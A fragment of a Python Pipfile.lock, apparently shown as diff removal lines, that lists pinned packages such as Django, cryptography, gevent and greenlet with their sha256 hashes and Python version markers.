"sha256:f184f0d851d96b6d29297354ed981b7dd71df7ff500d82fa6d11f0856bee8035" - ], - "markers": "python_full_version >= '3.6.2' and python_full_version < '4.0.0'", - "version": "==0.3.0" - }, - "click-plugins": { - "hashes": [ - "sha256:46ab999744a9d831159c3411bb0c79346d94a444df9a3a3742e9ed63645f264b", - "sha256:5d262006d3222f5057fd81e1623d4443e41dcda5dc815c06b442aa3c02889fc8" - ], - "version": "==1.1.1" - }, - "click-repl": { - "hashes": [ - "sha256:17849c23dba3d667247dc4defe1757fff98694e90fe37474f3feebb69ced26a9", - "sha256:fb7e06deb8da8de86180a33a9da97ac316751c094c6899382da7feeeeb51b812" - ], - "markers": "python_version >= '3.6'", - "version": "==0.3.0" - }, - "crcmod": { - "hashes": [ - "sha256:50586ab48981f11e5b117523d97bb70864a2a1af246cf6e4f5c4a21ef4611cd1", - "sha256:69a2e5c6c36d0f096a7beb4cd34e5f882ec5fd232efb710cdb85d4ff196bd52e", - "sha256:737fb308fa2ce9aed2e29075f0d5980d4a89bfbec48a368c607c5c63b3efb90e", - "sha256:dc7051a0db5f2bd48665a990d3ec1cc305a466a77358ca4492826f41f283601e" - ], - "version": "==1.7" - }, - "cryptography": { - "hashes": [ - "sha256:0d09fb5356f975974dbcb595ad2d178305e5050656affb7890a1583f5e02a306", - "sha256:23c2d778cf829f7d0ae180600b17e9fceea3c2ef8b31a99e3c694cbbf3a24b84", - "sha256:3fb248989b6363906827284cd20cca63bb1a757e0a2864d4c1682a985e3dca47", - "sha256:41d7aa7cdfded09b3d73a47f429c298e80796c8e825ddfadc84c8a7f12df212d", - "sha256:42cb413e01a5d36da9929baa9d70ca90d90b969269e5a12d39c1e0d475010116", - "sha256:4c2f0d35703d61002a2bbdcf15548ebb701cfdd83cdc12471d2bae80878a4207", - "sha256:4fd871184321100fb400d759ad0cddddf284c4b696568204d281c902fc7b0d81", - "sha256:5259cb659aa43005eb55a0e4ff2c825ca111a0da1814202c64d28a985d33b087", - "sha256:57a51b89f954f216a81c9d057bf1a24e2f36e764a1ca9a501a6964eb4a6800dd", - "sha256:652627a055cb52a84f8c448185922241dd5217443ca194d5739b44612c5e6507", - "sha256:67e120e9a577c64fe1f611e53b30b3e69744e5910ff3b6e97e935aeb96005858", - "sha256:6af1c6387c531cd364b72c28daa29232162010d952ceb7e5ca8e2827526aceae", - "sha256:6d192741113ef5e30d89dcb5b956ef4e1578f304708701b8b73d38e3e1461f34", - "sha256:7efe8041897fe7a50863e51b77789b657a133c75c3b094e51b5e4b5cec7bf906", - "sha256:84537453d57f55a50a5b6835622ee405816999a7113267739a1b4581f83535bd", - "sha256:8f09daa483aedea50d249ef98ed500569841d6498aa9c9f4b0531b9964658922", - "sha256:95dd7f261bb76948b52a5330ba5202b91a26fbac13ad0e9fc8a3ac04752058c7", - "sha256:a74fbcdb2a0d46fe00504f571a2a540532f4c188e6ccf26f1f178480117b33c4", - "sha256:a983e441a00a9d57a4d7c91b3116a37ae602907a7618b882c8013b5762e80574", - "sha256:ab8de0d091acbf778f74286f4989cf3d1528336af1b59f3e5d2ebca8b5fe49e1", - "sha256:aeb57c421b34af8f9fe830e1955bf493a86a7996cc1338fe41b30047d16e962c", - "sha256:ce785cf81a7bdade534297ef9e490ddff800d956625020ab2ec2780a556c313e", - "sha256:d0d651aa754ef58d75cec6edfbd21259d93810b73f6ec246436a21b7841908de" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==41.0.3" - }, - "dataclasses-json": { - "hashes": [ - "sha256:5ec6fed642adb1dbdb4182badb01e0861badfd8fda82e3b67f44b2d1e9d10d21", - "sha256:d82896a94c992ffaf689cd1fafc180164e2abdd415b8f94a7f78586af5886236" - ], - "index": "pypi", - "markers": "python_version < '3.13' and python_version >= '3.7'", - "version": "==0.5.14" - }, - "ddt": { - "hashes": [ - "sha256:e3c93b961a108b4f4d5a6c7f2263513d928baf3bb5b32af8e1c804bfb041141d", - "sha256:f71b348731b8c78c3100bffbd951a769fbd439088d1fdbb3841eee019af80acd" - ], - "index": "pypi", - "version": "==1.6.0" - }, - "defusedxml": { - "hashes": [ - "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69", - "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61" - ], - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", - "version": "==0.7.1" - }, - "diff-match-patch": { - "hashes": [ - "sha256:953019cdb9c9d2c9e47b5b12bcff3cf4746fc4598eb406076fa1fc27e6a1f15c", - "sha256:dce43505fb7b1b317de7195579388df0746d90db07015ed47a85e5e44930ef93" - ], - "markers": "python_version >= '3.7'", - "version": "==20230430" - }, - "django": { - "hashes": [ - "sha256:a477ab326ae7d8807dc25c186b951ab8c7648a3a23f9497763c37307a2b5ef87", - "sha256:dec2a116787b8e14962014bf78e120bba454135108e1af9e9b91ade7b2964c40" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==3.2.20" - }, - "django-add-default-value": { - "hashes": [ - "sha256:514b357f4a5e5c5dd9f02ca42d19d51688ed4a9cac62a7e35d09025f632bba93", - "sha256:a539767f498ab2e3022f98f743aa4473354a24df037859543cd2545f650cadcc" - ], - "index": "pypi", - "version": "==0.10.0" - }, - "django-celery-beat": { - "hashes": [ - "sha256:b8a13afb15e7c53fc04f4f847ac71a6d32088959aba701eb7c4a59f0c28ba543", - "sha256:c4c72a9579f20eff4c4ccf1b58ebdca5ef940f4210065057db1754ea5f8dffdc" - ], - "index": "pypi", - "version": "==2.2.0" - }, - "django-cors-headers": { - "hashes": [ - "sha256:9ada212b0e2efd4a5e339360ffc869cb21ac5605e810afe69f7308e577ea5bde", - "sha256:f9749c6410fe738278bc2b6ef17f05195bc7b251693c035752d8257026af024f" - ], - "index": "pypi", - "markers": "python_version >= '3.8'", - "version": "==4.2.0" - }, - "django-cprofile-middleware": { - "hashes": [ - "sha256:b942185a38f3b582935a55c768f126ce9a6f0cefceee3b5d19e6b307ad129889" - ], - "index": "pypi", - "version": "==1.0.5" - }, - "django-elasticsearch-dsl": { - "hashes": [ - "sha256:3c58a254a6318b169eb904d41d802924b99ea8e53ddc2c596ebba90506cf47fa", - "sha256:811d3909b3387fd55c19d9bbcf0e9a9b234f085df3f8422d59e7519a5f733e0e" - ], - "index": "pypi", - "version": "==7.2.2" - }, - "django-filter": { - "hashes": [ - "sha256:2fe15f78108475eda525692813205fa6f9e8c1caf1ae65daa5862d403c6dbf00", - "sha256:d12d8e0fc6d3eb26641e553e5d53b191eb8cec611427d4bdce0becb1f7c172b5" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==23.2" - }, - "django-health-check": { - "hashes": [ - "sha256:20dc5ccb516a4e7163593fd4026f0a7531e3027b47d23ebe3bd9dbc99ac4354c", - "sha256:d1b8671e79d1de6e3dd1a9c69566222b0bfcfacca8b90511a4407b2d0d3d2778" - ], - "index": "pypi", - "markers": "python_version >= '3.8'", - "version": "==3.17.0" - }, - "django-import-export": { - "hashes": [ - "sha256:c39c003bfc803fb63ba7742562f1667603a4a8d7426261845d75ce8582d40f48", - "sha256:cf6f3dabdd4f32dcb26e25c7ddcba7aee3168b55d380b0da79f0349afa17c011" - ], - "index": "pypi", - "markers": "python_version >= '3.5'", - "version": "==2.5.0" - }, - "django-mock-queries": { - "hashes": [ - "sha256:7ee3f34752e8131479924ea6952fe37c4106cc18e6fc3e5e9b28b333eeda10b3" - ], - "index": "pypi", - "version": "==2.1.7" - }, - "django-modeltranslation": { - "hashes": [ - "sha256:e247840b9038b7e7b2dc6f1b4868dfe88737540883eaed3d4b4775e5bd89c7fd" - ], - "index": "pypi", - "version": "==0.17.7" - }, - "django-prometheus": { - "hashes": [ - "sha256:cf9b26f7ba2e4568f08f8f91480a2882023f5908579681bcf06a4d2465f12168", - "sha256:f9c8b6c780c9419ea01043c63a437d79db2c33353451347894408184ad9c3e1e" - ], - "index": "pypi", - "version": "==2.3.1" - }, - "django-ranged-response": { - "hashes": [ - "sha256:f71fff352a37316b9bead717fc76e4ddd6c9b99c4680cdf4783b9755af1cf985" - ], - "index": "pypi", - "version": "==0.2.0" - }, - "django-redis": { - "hashes": [ - "sha256:1d037dc02b11ad7aa11f655d26dac3fb1af32630f61ef4428860a2e29ff92026", - "sha256:8a99e5582c79f894168f5865c52bd921213253b7fd64d16733ae4591564465de" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==5.2.0" - }, - "django-rest-framework-proxy": { - "hashes": [ - "sha256:f5154c525c851f98680a960f43526de98af545e1cb9b4cfaa08a230fb7f1e58d" - ], - "index": "pypi", - "version": "==1.6.0" - }, - "django-seriously": { - "hashes": [ - "sha256:591a2be6e18c229117e0196d9c8e6bd600f5c52f9eebe868e709c71acb53ef58", - "sha256:771f88a24f6166bdb3a944769fa09e24c317ea1b8f5ee8040d121d30b4395219" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==0.4.3" - }, - "django-silk": { - "hashes": [ - "sha256:2f1fcaaf21192011147537fe1ca72dc9f552f32d7043ebd82aeeda370f194469", - "sha256:50552f06d9306d06517fbeab9a2c74856355e06304f03ed16b6dd353f7c77e7a" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==5.0.3" - }, - "django-simple-captcha": { - "hashes": [ - "sha256:567ad84fa64c86508c679b8425cc1410c44b3cd6467e54f8d31cf077d9366407", - "sha256:6e1fcc4f4005f7d69ee7a2e59a7e863b5d3918f36a85a4d811498984aecc48ce" - ], - "index": "pypi", - "version": "==0.5.18" - }, - "django-stubs": { - "extras": ["compatible-mypy"], - "hashes": [ - "sha256:0bbf9eb172c5b06eccff2d704c7c3906e4a2c6146df8c32ee9f3a51e29265581", - "sha256:25010658acac0ce4a69211b55dd719fd16dbfe54fcfe5c878d0c8db07bdd5482" - ], - "markers": "python_version >= '3.7'", - "version": "==1.15.0" - }, - "django-stubs-ext": { - "hashes": [ - "sha256:c69d1cc46f1c4c3b7894b685a5022c29b2a36c7cfb52e23762eaf357ebfc2c98", - "sha256:fdacc65a14d2d4b97334b58ff178a5853ec8c8c76cec406e417916ad67536ce4" - ], - "markers": "python_version >= '3.8'", - "version": "==4.2.2" - }, - "django-timezone-field": { - "hashes": [ - "sha256:5dd5bd9249382bef8847d3e7e4c32b7be182a4b538f354130d1252ed228892f8", - "sha256:7552d2b0f145684b7de3fb5046101c7efd600cc6ba951b15c630fa1e1b83558e" - ], - "markers": "python_version >= '3.5'", - "version": "==4.2.3" - }, - "django-utils": { - "hashes": [ - "sha256:98b59b368d499b4d1b6dc66f15c0a136833bea12e0b299efdbfd754dc04c79d5" - ], - "index": "pypi", - "version": "==0.0.2" - }, - "django-utils-six": { - "hashes": [ - "sha256:4ef9d20de679a5b2448429476452493661fe08f23d6e788a8e9816ec05e3c5b0", - "sha256:8f0e77289d911069a6a15bab5a25ccf2c0fcb8fc4177461dd17470cfdeb94aa6" - ], - "index": "pypi", - "markers": "python_version >= '3.6' and python_version < '4.0'", - "version": "==2.0" - }, - "django-xff": { - "hashes": [ - "sha256:8935dce34383d65b545564a3cc17dc8010c8cdec231b0932e6073ddc766d679d", - "sha256:d2a34e947e730d0c899b6386b28cf675edafa9d64336cdb8c9656b0a58ed80b6", - "sha256:fc87333f64d2ff2ce4ab6449e814240f9f195c290d2c8789ca81a1c98f5522ec" - ], - "index": "pypi", - "version": "==1.4.0" - }, - "djangorestframework": { - "hashes": [ - "sha256:6d1d59f623a5ad0509fe0d6bfe93cbdfe17b8116ebc8eda86d45f6e16e819aaf", - "sha256:f747949a8ddac876e879190df194b925c177cdeb725a099db1460872f7c0a7f2" - ], - "index": "pypi", - "markers": "python_version >= '3.5'", - "version": "==3.12.4" - }, - "djangorestframework-dataclasses": { - "hashes": [ - "sha256:802300f812a96715079209f8dabecbab0b9716ae34a770db61f51a6897916abf", - "sha256:b061ef12f23394e91107f9b915dec38fb0a69d97a0ac9e62207aa90908375211" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==1.3.0" - }, - "djangorestframework-stubs": { - "extras": ["compatible-mypy"], - "hashes": [ - "sha256:89f6c2add193cb5ab61b9e47187b33a93cc099376a8df5e4d6c3fc8ecb992d3b", - "sha256:9475e1374b057ffbdcaaa84a060fe5f01476d8b9014d82a83b4153f57fbcbc1f" - ], - "markers": "python_version >= '3.7'", - "version": "==1.9.1" - }, - "docxcompose": { - "hashes": [ - "sha256:b1a40d4f95751565822350174971012875f82a32b83a9d1be098edd965047029" - ], - "index": "pypi", - "version": "==1.3.4" - }, - "docxtpl": { - "hashes": [ - "sha256:6ce60f38ce01d1698932bfba5c8b02e14c2cbdfb13c1c1fa15c30c433d88982d", - "sha256:a18e33e2e25a4c63d49cd76a3f1e495e53eb96062ecbc7715a8d8f4540c3195b" - ], - "index": "pypi", - "version": "==0.16.0" - }, - "drf-spectacular": { - "hashes": [ - "sha256:17ac5e31e5d6150dd5fa10843b429202f4f38069202acc44394cc5a771de63d9", - "sha256:866e16ddaae167a1234c76cd8c351161373551db994ce9665b347b32d5daf38b" - ], - "index": "pypi", - "markers": "python_version >= '3.6'", - "version": "==0.22.1" - }, - "elasticsearch": { - "hashes": [ - "sha256:555170b4e13a823f4472bc12a148aef90febd5b90b16be83651d35524f34acb3", - "sha256:ed9c0cd58e05959a56e306ecf444f794da6afde75b213e26758f7a317e5e668c" - ], - "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3' and python_version < '4'", - "version": "==7.17.7" - }, - "elasticsearch-dsl": { - "hashes": [ - "sha256:07ee9c87dc28cc3cae2daa19401e1e18a172174ad9e5ca67938f752e3902a1d5", - "sha256:97f79239a252be7c4cce554c29e64695d7ef6a4828372316a5e5ff815e7a7498" - ], - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==7.4.1" - }, - "et-xmlfile": { - "hashes": [ - "sha256:8eb9e2bc2f8c97e37a2dc85a09ecdcdec9d8a396530a6d5a33b30b9a92da0c5c", - "sha256:a2ba85d1d6a74ef63837eed693bcb89c3f752169b0e3e7ae5b16ca5e1b3deada" - ], - "markers": "python_version >= '3.6'", - "version": "==1.1.0" - }, - "flower": { - "hashes": [ - "sha256:5ab717b979530770c16afb48b50d2a98d23c3e9fe39851dcf6bc4d01845a02a0", - "sha256:9db2c621eeefbc844c8dd88be64aef61e84e2deb29b271e02ab2b5b9f01068e2" - ], - "index": "pypi", - "markers": "python_version >= '3.7'", - "version": "==2.0.1" - }, - "gevent": { - "hashes": [ - "sha256:018f93de7d5318d2fb440f846839a4464738468c3476d5c9cf7da45bb71c18bd", - "sha256:0d581f22a5be6281b11ad6309b38b18f0638cf896931223cbaa5adb904826ef6", - "sha256:1472012493ca1fac103f700d309cb6ef7964dcdb9c788d1768266e77712f5e49", - "sha256:172caa66273315f283e90a315921902cb6549762bdcb0587fd60cb712a9d6263", - "sha256:17b68f4c9e20e47ad49fe797f37f91d5bbeace8765ce2707f979a8d4ec197e4d", - "sha256:1ca01da176ee37b3527a2702f7d40dbc9ffb8cfc7be5a03bfa4f9eec45e55c46", - "sha256:1d543c9407a1e4bca11a8932916988cfb16de00366de5bf7bc9e7a3f61e60b18", - "sha256:1e1286a76f15b5e15f1e898731d50529e249529095a032453f2c101af3fde71c", - "sha256:1e955238f59b2947631c9782a713280dd75884e40e455313b5b6bbc20b92ff73", - "sha256:1f001cac0ba8da76abfeb392a3057f81fab3d67cc916c7df8ea977a44a2cc989", - "sha256:1ff3796692dff50fec2f381b9152438b221335f557c4f9b811f7ded51b7a25a1", - "sha256:2929377c8ebfb6f4d868d161cd8de2ea6b9f6c7a5fcd4f78bcd537319c16190b", - "sha256:319d8b1699b7b8134de66d656cd739b308ab9c45ace14d60ae44de7775b456c9", - "sha256:323b207b281ba0405fea042067fa1a61662e5ac0d574ede4ebbda03efd20c350", - "sha256:3b7eae8a0653ba95a224faaddf629a913ace408edb67384d3117acf42d7dcf89", - "sha256:4114f0f439f0b547bb6f1d474fee99ddb46736944ad2207cef3771828f6aa358", - "sha256:4197d423e198265eef39a0dea286ef389da9148e070310f34455ecee8172c391", - "sha256:494c7f29e94df9a1c3157d67bb7edfa32a46eed786e04d9ee68d39f375e30001", - "sha256:4e2f008c82dc54ec94f4de12ca6feea60e419babb48ec145456907ae61625aa4", - "sha256:53ee7f170ed42c7561fe8aff5d381dc9a4124694e70580d0c02fba6aafc0ea37", - "sha256:54f4bfd74c178351a4a05c5c7df6f8a0a279ff6f392b57608ce0e83c768207f9", - "sha256:58898dbabb5b11e4d0192aae165ad286dc6742c543e1be9d30dc82753547c508", - "sha256:59b47e81b399d49a5622f0f503c59f1ce57b7705306ea0196818951dfc2f36c8", - "sha256:5aa99e4882a9e909b4756ee799c6fa0f79eb0542779fad4cc60efa23ec1b2aa8", - "sha256:6c04ee32c11e9fcee47c1b431834878dc987a7a2cc4fe126ddcae3bad723ce89", - "sha256:84c517e33ed604fa06b7d756dc0171169cc12f7fdd68eb7b17708a62eebf4516", - "sha256:8729129edef2637a8084258cb9ec4e4d5ca45d97ac77aa7a6ff19ccb530ab731", - "sha256:877abdb3a669576b1d51ce6a49b7260b2a96f6b2424eb93287e779a3219d20ba", - "sha256:8c192d2073e558e241f0b592c1e2b34127a4481a5be240cad4796533b88b1a98", - "sha256:8f2477e7b0a903a01485c55bacf2089110e5f767014967ba4b287ff390ae2638", - "sha256:96c56c280e3c43cfd075efd10b250350ed5ffd3c1514ec99a080b1b92d7c8374", - "sha256:97cd42382421779f5d82ec5007199e8a84aa288114975429e4fd0a98f2290f10", - "sha256:98bc510e80f45486ef5b806a1c305e0e89f0430688c14984b0dbdec03331f48b", - "sha256:990d7069f14dc40674e0d5cb43c68fd3bad8337048613b9bb94a0c4180ffc176", - "sha256:9d85574eb729f981fea9a78998725a06292d90a3ed50ddca74530c3148c0be41", - "sha256:a2237451c721a0f874ef89dbb4af4fdc172b76a964befaa69deb15b8fff10f49", - "sha256:a47a4e77e2bc668856aad92a0b8de7ee10768258d93cd03968e6c7ba2e832f76", - "sha256:a5488eba6a568b4d23c072113da4fc0feb1b5f5ede7381656dc913e0d82204e2", - "sha256:ae90226074a6089371a95f20288431cd4b3f6b0b096856afd862e4ac9510cddd", - "sha256:b43d500d7d3c0e03070dee813335bb5315215aa1cf6a04c61093dfdd718640b3", - "sha256:b6c144e08dfad4106effc043a026e5d0c0eff6ad031904c70bf5090c63f3a6a7", - "sha256:d21ad79cca234cdbfa249e727500b0ddcbc7adfff6614a96e6eaa49faca3e4f2", - "sha256:d82081656a5b9a94d37c718c8646c757e1617e389cdc533ea5e6a6f0b8b78545", - "sha256:da4183f0b9d9a1e25e1758099220d32c51cc2c6340ee0dea3fd236b2b37598e4", - "sha256:db562a8519838bddad0c439a2b12246bab539dd50e299ea7ff3644274a33b6a5", - "sha256:ddaa3e310a8f1a45b5c42cf50b54c31003a3028e7d4e085059090ea0e7a5fddd", - "sha256:ed7f16613eebf892a6a744d7a4a8f345bc6f066a0ff3b413e2479f9c0a180193", - "sha256:efc003b6c1481165af61f0aeac248e0a9ac8d880bb3acbe469b448674b2d5281", - "sha256:f01c9adbcb605364694b11dcd0542ec468a29ac7aba2fb5665dc6caf17ba4d7e", - "sha256:f23d0997149a816a2a9045af29c66f67f405a221745b34cefeac5769ed451db8", - "sha256:f3329bedbba4d3146ae58c667e0f9ac1e6f1e1e6340c7593976cdc60aa7d1a47", - "sha256:f7ed2346eb9dc4344f9cb0d7963ce5b74fe16fdd031a2809bb6c2b6eba7ebcd5" - ], - "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4, 3.5'", - "version": "==22.10.2" - }, - "gprof2dot": { - "hashes": [ - "sha256:45b4d298bd36608fccf9511c3fd88a773f7a1abc04d6cd39445b11ba43133ec5", - "sha256:f165b3851d3c52ee4915eb1bd6cca571e5759823c2cd0f71a79bda93c2dc85d6" - ], - "markers": "python_version >= '2.7'", - "version": "==2022.7.29" - }, - "greenlet": { - "hashes": [ - "sha256:03a8f4f3430c3b3ff8d10a2a86028c660355ab637cee9333d63d66b56f09d52a", - "sha256:0bf60faf0bc2468089bdc5edd10555bab6e85152191df713e2ab1fcc86382b5a", - "sha256:18a7f18b82b52ee85322d7a7874e676f34ab319b9f8cce5de06067384aa8ff43", - "sha256:18e98fb3de7dba1c0a852731c3070cf022d14f0d68b4c87a19cc1016f3bb8b33", - "sha256:1a819eef4b0e0b96bb0d98d797bef17dc1b4a10e8d7446be32d1da33e095dbb8", - "sha256:26fbfce90728d82bc9e6c38ea4d038cba20b7faf8a0ca53a9c07b67318d46088", - "sha256:2780572ec463d44c1d3ae850239508dbeb9fed38e294c68d19a24d925d9223ca", - "sha256:283737e0da3f08bd637b5ad058507e578dd462db259f7f6e4c5c365ba4ee9343", - "sha256:2d4686f195e32d36b4d7cf2d166857dbd0ee9f3d20ae349b6bf8afc8485b3645", - "sha256:2dd11f291565a81d71dab10b7033395b7a3a5456e637cf997a6f33ebdf06f8db", - "sha256:30bcf80dda7f15ac77ba5af2b961bdd9dbc77fd4ac6105cee85b0d0a5fcf74df", - "sha256:32e5b64b148966d9cccc2c8d35a671409e45f195864560829f395a54226408d3", - "sha256:36abbf031e1c0f79dd5d596bfaf8e921c41df2bdf54ee1eed921ce1f52999a86", - "sha256:3a06ad5312349fec0ab944664b01d26f8d1f05009566339ac6f63f56589bc1a2", - "sha256:3a51c9751078733d88e013587b108f1b7a1fb106d402fb390740f002b6f6551a", - "sha256:3c9b12575734155d0c09d6c3e10dbd81665d5c18e1a7c6597df72fd05990c8cf", - "sha256:3f6ea9bd35eb450837a3d80e77b517ea5bc56b4647f5502cd28de13675ee12f7", - "sha256:4b58adb399c4d61d912c4c331984d60eb66565175cdf4a34792cd9600f21b394", - "sha256:4d2e11331fc0c02b6e84b0d28ece3a36e0548ee1a1ce9ddde03752d9b79bba40", - "sha256:5454276c07d27a740c5892f4907c86327b632127dd9abec42ee62e12427ff7e3", - "sha256:561091a7be172ab497a3527602d467e2b3fbe75f9e783d8b8ce403fa414f71a6", - "sha256:6c3acb79b0bfd4fe733dff8bc62695283b57949ebcca05ae5c129eb606ff2d74", - "sha256:703f18f3fda276b9a916f0934d2fb6d989bf0b4fb5a64825260eb9bfd52d78f0", - "sha256:7492e2b7bd7c9b9916388d9df23fa49d9b88ac0640db0a5b4ecc2b653bf451e3", - "sha256:76ae285c8104046b3a7f06b42f29c7b73f77683df18c49ab5af7983994c2dd91", - "sha256:7cafd1208fdbe93b67c7086876f061f660cfddc44f404279c1585bbf3cdc64c5", - "sha256:7efde645ca1cc441d6dc4b48c0f7101e8d86b54c8530141b09fd31cef5149ec9", - "sha256:88d9ab96491d38a5ab7c56dd7a3cc37d83336ecc564e4e8816dbed12e5aaefc8", - "sha256:8eab883b3b2a38cc1e050819ef06a7e6344d4a990d24d45bc6f2cf959045a45b", - "sha256:910841381caba4f744a44bf81bfd573c94e10b3045ee00de0cbf436fe50673a6", - "sha256:9190f09060ea4debddd24665d6804b995a9c122ef5917ab26e1566dcc712ceeb", - "sha256:937e9020b514ceedb9c830c55d5c9872abc90f4b5862f89c0887033ae33c6f73", - "sha256:94c817e84245513926588caf1152e3b559ff794d505555211ca041f032abbb6b", - "sha256:971ce5e14dc5e73715755d0ca2975ac88cfdaefcaab078a284fea6cfabf866df", - "sha256:9d14b83fab60d5e8abe587d51c75b252bcc21683f24699ada8fb275d7712f5a9", - "sha256:9f35ec95538f50292f6d8f2c9c9f8a3c6540bbfec21c9e5b4b751e0a7c20864f", - "sha256:a1846f1b999e78e13837c93c778dcfc3365902cfb8d1bdb7dd73ead37059f0d0", - "sha256:acd2162a36d3de67ee896c43effcd5ee3de247eb00354db411feb025aa319857", - "sha256:b0ef99cdbe2b682b9ccbb964743a6aca37905fda5e0452e5ee239b1654d37f2a", - "sha256:b80f600eddddce72320dbbc8e3784d16bd3fb7b517e82476d8da921f27d4b249", - "sha256:b864ba53912b6c3ab6bcb2beb19f19edd01a6bfcbdfe1f37ddd1778abfe75a30", - "sha256:b9ec052b06a0524f0e35bd8790686a1da006bd911dd1ef7d50b77bfbad74e292", - "sha256:ba2956617f1c42598a308a84c6cf021a90ff3862eddafd20c3333d50f0edb45b", - "sha256:bdfea8c661e80d3c1c99ad7c3ff74e6e87184895bbaca6ee8cc61209f8b9b85d", - "sha256:be4ed120b52ae4d974aa40215fcdfde9194d63541c7ded40ee12eb4dda57b76b", - "sha256:c4302695ad8027363e96311df24ee28978162cdcdd2006476c43970b384a244c", - "sha256:c48f54ef8e05f04d6eff74b8233f6063cb1ed960243eacc474ee73a2ea8573ca", - "sha256:c9c59a2120b55788e800d82dfa99b9e156ff8f2227f07c5e3012a45a399620b7", - "sha256:cd021c754b162c0fb55ad5d6b9d960db667faad0fa2ff25bb6e1301b0b6e6a75", - "sha256:d27ec7509b9c18b6d73f2f5ede2622441de812e7b1a80bbd446cb0633bd3d5ae", - "sha256:d5508f0b173e6aa47273bdc0a0b5ba055b59662ba7c7ee5119528f466585526b", - "sha256:d75209eed723105f9596807495d58d10b3470fa6732dd6756595e89925ce2470", - "sha256:db1a39669102a1d8d12b57de2bb7e2ec9066a6f2b3da35ae511ff93b01b5d564", - "sha256:dbfcfc0218093a19c252ca8eb9aee3d29cfdcb586df21049b9d777fd32c14fd9", - "sha256:e0f72c9ddb8cd28532185f54cc1453f2c16fb417a08b53a855c4e6a418edd099", - "sha256:e7c8dc13af7db097bed64a051d2dd49e9f0af495c26995c00a9ee842690d34c0", - "sha256:ea9872c80c132f4663822dd2a08d404073a5a9b5ba6155bea72fb2a79d1093b5", - "sha256:eff4eb9b7eb3e4d0cae3d28c283dc16d9bed6b193c2e1ace3ed86ce48ea8df19", - "sha256:f82d4d717d8ef19188687aa32b8363e96062911e63ba22a0cff7802a8e58e5f1", - "sha256:fc3a569657468b6f3fb60587e48356fe512c1754ca05a564f11366ac9e306526" - ], - "markers": "platform_python_implementation == 'CPython'", - "version": "==2.0.2" - }, - "gunicorn": { - "hashes": [ - "sha256:9dcc4547dbb1cb284accfb15ab5667a0e5d1881cc443e0677b4882a4067a807e", - "sha256:e0a968b5ba15f8a328fdfd7ab1fcb5af4470c28aaf7e55df02a99bc13138e6e8" - ], - "index": "pypi", - "markers": "python_version >= '3.5'", - "version": "==20.1.0" - }, - "humanize": { - "hashes": [ - "sha256:8bc9e2bb9315e61ec06bf690151ae35aeb65651ab091266941edf97c90836404", - "sha256:9783373bf1eec713a770ecaa7c2d7a7902c98398009dfa3d8a2df91eec9311e8" - ], - "markers": "python_version >= '3.8'", - "version": "==4.8.0" - }, - "id-validator": { - "hashes": [ - "sha256:90b73b89f807f8b387beaa7f1f86baa4a64fa5674df5db9ab1a7362433f8e3b8" - ], - "index": "pypi", - "markers": "python_version >= '3'", - "version": "==1.0.20" - }, - "idna": { - "hashes": [ - "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", - "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" - ], - "index": "pypi", - "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==2.10" - }, - "inflection": { - "hashes": [ - "sha256:1a29730d366e996aaacffb2f1f1cb9593dc38e2ddd30c91250c6dde09ea9b417", - "sha256:f38b2b640938a4f35ade69ac3d053042959b62a0f1076a5bbaa1b9526605a8a2" - ], - "markers": "python_version >= '3.5'", - "version": "==0.5.1" - }, - "jinja2": { - "hashes": [ - "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852", - "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61" - ], - "markers": "python_version >= '3.7'", - "version": "==3.1.2" - }, - "jmespath": { - "hashes": [ - "sha256:b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9", - "sha256:cdf6525904cc597730141d61b36f2e4b8ecc257c420fa2f4549bac2c2d0cb72f" - ], - "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", - "version": "==0.10.0" - }, - "jq": { - "hashes": [ - "sha256:0015b80570b38176f5ac22049b957d4f34ee8030f6ee89955f95bce4bfff8451", - "sha256:028604640ba281c2bc5fa1b4284078d4d56d9431c96b6f71715fd801a3d2cdfb", - "sha256:05d44bdf6a97ad4866ad099fed5297214a58e1e3e56657be41495c69ce74aa11", - "sha256:06d02868ec10cf1e744fda3ec1b6928eb2a05fbbb3b52383c85285d52e8e000a", - "sha256:0d8c8a0e7bc6f738e482472b4fbb6be97eab707924661782e90c378327688b29", - "sha256:0dc8ca9e2ea1afc8e856e92eee70f6ab728342d1c071c741b2047d5c08961d8a", - "sha256:118070043a369378feadf22f091e57b4054b3325ccdc248e1f19c8586bfe9e6f", - "sha256:11d6e7c98efcb38b95481687310ed0ec7f230cc8916ac1c054827552f45ece5d", - "sha256:150aeaa02d57fc9c4966c7af8c6c2a9c6736f82a798c7bc72b44dd7970f1f8d8", - "sha256:1569aa11654a686be9323c9c4329d4a961dd96f9f0b9800eb3bdd939b017cb8a", - "sha256:16e28f6964b827a5170a0d7f086367601ef1d420952de81934e79cff638a6bc8", - "sha256:18bb7c70fc01f5e4739b1ac3cbab958eae881b1991615c973b9cdcfcd06ce93f", - "sha256:228c42e825007277fd01ad71f6ea93bda289fe45693b2d3649eeb87b75a6b083", - "sha256:28c6ec10c97e697ca73d1fe188c340d53ad17fc4b42fcca87570c060f9364c55", - 